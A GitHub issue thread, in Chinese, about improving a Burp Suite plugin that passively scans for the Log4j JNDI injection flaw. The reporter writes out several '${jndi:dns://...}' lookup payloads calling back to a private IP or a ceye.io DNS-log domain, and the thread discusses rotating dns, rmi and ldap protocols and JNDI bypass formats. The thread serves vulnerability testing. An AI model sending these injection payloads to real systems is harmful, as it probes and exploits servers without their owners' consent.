Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

关于部分的优化建议 #21

Closed
Chinakentgao opened this issue Dec 15, 2021 · 12 comments
Closed

关于部分的优化建议 #21

Chinakentgao opened this issue Dec 15, 2021 · 12 comments
Labels
enhancement New feature or request

Comments

@Chinakentgao
Copy link

Chinakentgao commented Dec 15, 2021
edited
Loading

1.内网很多时候不会特意搭建dnslog来测试,更多的是直接启用jndi服务然后存在漏洞的资产主动回连你所设置的ldap/rmi://ip:port/xxx。插件的设置只支持内网的dnslog格式而且不带域名解析的情况下生成的参数根本无法正常访问。目标机子没有你的域名解析记录,所以只能是完整的IP格式
错误的:${jndi:dns://0.POST.192.168.80.10.hello.192.168.80.6:8001/%20test}
正确的:${jndi:dns://192.168.80.6:8001/%20test}
这样的情况就会出现没办法定位漏洞参数位置,但是可以找到存在漏洞。需要进一步手工一个一个参数测试。不能依靠域名解析时候携带的数字编号进行快速定位了。这部分的优化时可以把内网的dnslog配置直接用ip:port的方式代替,出不出网都没办法解析到你私有化部署的dnslog。
2.还有dns改rmi发送的payload还是dns。改ldap干脆就不发送了。干脆3个轮流遍历一遍这样能省去很多时间,特别面对众多资产的时候3个参数轮着改还要所有访问再执行一遍效率很低。你可以加个开关要么指定要么默认3个都测试一遍。
3.{jndi:dns://0.POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce.xxx.ceye.io/%20test POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce. 这部分有点多余是不是可以考虑简化一下,万一域名带奇怪的内容反而回连时触发了安全设备的规则。保留数字的部分0.xxx.ceye.io/%20test即可。
4.jndi:绕过的几个格式都加入到默认发送的状态,保证漏洞定位的准确性。
@f0ng
Copy link
Owner

f0ng commented Dec 15, 2021

感谢师傅反馈
建议1会在后续版本更新
建议2已经在小版本更新0.15.3,改了前面的,写死了,后面的改了前面的就忘记了
建议3会考虑缩小查询的范围
建议4会在后续版本考虑更新,实战中对jndi:绕过的实用性不是很大,反而容易被封,所以对jndi:的绕过轮询发请求不太适合

@Chinakentgao
Copy link
Author

Chinakentgao commented Dec 15, 2021
edited
Loading

xxx.ceye.io 支持还是有问题dns有记录但插件上没检测出来。而且第一次发送请求后再一次测试就不会重复发送了。修改配置也无法再次发送请求得手动发送。测试靶场:http://d63bb2586.lab.aqlab.cn

@f0ng
Copy link
Owner

f0ng commented Dec 15, 2021

感谢师傅反馈,0.15.4修复该问题,关于第一次发送请求后再一次测试就不会重复发送了本插件是通过Passive接口进行扫描,如果第一次扫描过了,第二次再次加载插件,是不会再次扫描,需要重启burp即可

@f0ng
Copy link
Owner

f0ng commented Dec 15, 2021

0.15 bug太多了,师傅等0.16版本出来再提建议吧,我这两个版本同时改代码,忙不过来了

@Chinakentgao
Copy link
Author

Chinakentgao commented Dec 15, 2021 via email

@f0ng
Copy link
Owner

f0ng commented Dec 15, 2021

0.15.5版本修复了ceye.io无法检测漏洞的问题,原因是回溯了代码😓

@Chinakentgao
Copy link
Author

Chinakentgao commented Dec 15, 2021 via email

@f0ng
Copy link
Owner

f0ng commented Dec 15, 2021

建议1已在0.16版本更新

@kN6jq
Copy link

kN6jq commented Dec 16, 2021

师傅 能不能改成自行选择插入点,哪些字段进行测试,如get cookie等。

@f0ng
Copy link
Owner

f0ng commented Dec 16, 2021

师傅 能不能改成自行选择插入点,哪些字段进行测试,如get cookie等。

目前默认情况是get都会插入,cookie可以选择全部和单个,在自定义参数页面

@f0ng
Copy link
Owner

f0ng commented Dec 16, 2021

建议3已在0.16.4版本更新

@f0ng
Copy link
Owner

f0ng commented Dec 16, 2021

目前是取每个路径的第一个字符,如uri为"/login/uri/index.php”,那么请求的dnslog为l.u.i.p.xxxx.ceye.io,减少长度

@f0ng f0ng closed this as completed Dec 16, 2021
@f0ng f0ng added the enhancement New feature or request label Dec 19, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
enhancement New feature or request
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@kN6jq @f0ng @Chinakentgao